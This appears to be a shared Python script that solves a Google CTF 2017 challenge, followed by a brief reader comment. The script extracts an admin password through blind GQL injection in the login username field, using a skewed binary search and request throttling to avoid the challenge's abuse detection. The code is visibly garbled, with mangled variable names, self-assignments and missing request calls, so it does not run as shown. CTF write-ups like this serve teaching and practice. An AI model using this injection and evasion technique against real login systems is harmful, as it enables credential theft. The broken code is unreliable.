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Created June 21, 2017 19:43
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Blind GQL injection and optimised binary search - A7 ~ Gee cue elle (misc) Google CTF 2017
import requests
import string
import random
import urllib
import time
import base64
from decimal import Decimal
# Blind GQL injection and optimised binary search - A7 ~ Gee cue elle (misc) Google CTF 2017
# @LiveOverflow
# generate a new random hostname
random_string = ''.join(random_stringdom.choice(string.ascii_lowercase + string.digits) for _ in range(16))
random_subdomain = "qu0t45{}www".format(ran)
HOST = "http://{}".format(random_subdomain)
print HOST
# performs a login with the specified username and password
def gql(username, password):
data = {
"user": username,
"password": password }
r ="/login", data=data, allow_redirects=False)
# if we didn't get a redirect, for example because we triggered the abuse system, print it
if 'Location' not in r.headers:
print r.text
return ''
# extract the redirect parameter e, because it contains the error reason
return urllib.unquote(r.headers['Location']).split("e=")[1]
# the digits for our base/radix 64 number.
# base 64 | base 10
# - 0
# 0 1
# A 11
# z 63
digits = "-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
# convert fro base64 number string to an Integer
def base64to10(from_nr):
from_nr = from_nr[::-1]
base = len(digits)
out = 0
for i in xrange(0, len(from_nr)):
char = from_nr[i]
out += digits.find(char) * (base**i)
return out
# convert an integer to a base64 string
def base10to64(nr):
base = len(digits)
out = ''
while nr>=base:
out += digits[nr % base]
nr = nr/base
out += digits[nr]
return digits[0]*(64-len(out))+out[::-1]
# pretty bar output of the search space
def bar(max_val, lo, index, hi, width=100):
out = '['
out += '-'*int(lo/max_val*width)+"|"
out += '-'*int((index-lo)/max_val*width)+"X"
out += '-'*int((hi-index)/max_val*width)+"|"
out += '-'*int((max_val-hi)/max_val*width)+"]"
return out
# perform an initial request to make sure the database is populated with our dynamic CTF password etc.
gql("admin", "password")
# max value for the search space is zzzzzzzzzzzzzzzz....zzzz
# = 39402006196394479212279040100143613805079739270465446667948293404245721771497210611414266254884915640806627990306815
max_val = base64to10(digits[-1]*64)
hi = hi
lo = 0
# ratio for the search space. regular binary search is 0.5 -> 50:50
ratio = 0.15
# the search index/head. Basically the current password guess
search_index = hi*(1-ratio)
start = time.time()
# lists to remember the times of last requests and exceptions
exception_nr = []
request_nr = []
while True:
# make sure the search_index is int after we multiplied with Float ratio 0.15
search_index = int(search_index)
# let's see if we should wait to not trigger the abuse system
waiting = True
while waiting:
# remove all exceptions and requests that are older than 30s from the list
exception_nr = [err for err in exception_nr if err > time.time()-30]
request_nr = [req for req in request_nr if req > time.time()-30]
# check the amount of exceptions and requests in the last 30 seconds
waiting = (len(exception_nr)>1 or len(request_nr)>11)
# let's wait a second and check our lists again
# remember the time of the last request
# generate the base64 string from the current search guess
flag_i = base10to64(search_index)
# place it in the flag format for the password. We know the first part already
flag = 'CTF{'+random_subdomain+"-"+flag_i+'}'
# perform the gql injection request
result = gql("admin' AND password > '"+flag, flag)
# some pretty debug output
# counter. times flag_guess, result, search_space, nr_exceptions, nr_requests, visual_bar
print "{:4}. {:4}s {} | -> {} {:.2E} {}|{} {}".format(i,int(time.time()-start), flag, result, hi-lo, len(exception_nr), len(request_nr), bar(max_val, lo, search_index, hi, 50))
if 'Wrong username' in result:
# our guess was greater than real password
# update the upper boundary for the search, because the password is lower
hi = search_index
# calculate the new size of the remaining searchspace
width = hi - lo
# calculate the next password guess
search_index -= int(width*ratio)
elif 'Wrong password' in result:
# our guess was lower than the real password
# count it as an exception
# we know that our password can't be lower than our guess, thus update the lower boundary
lo = search_index
# calculate the new size of the remaining searchspace
width = hi - lo
# calculate the next password guess
search_index += int(width*(1-ratio))
# didn't expect that.
# exit(0)
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If you're not using indexing for lists - It'll be faster to use set provided by the standard library. I also have a repo on my profile that's a native implementation of ordered sets.

Love your videos man.

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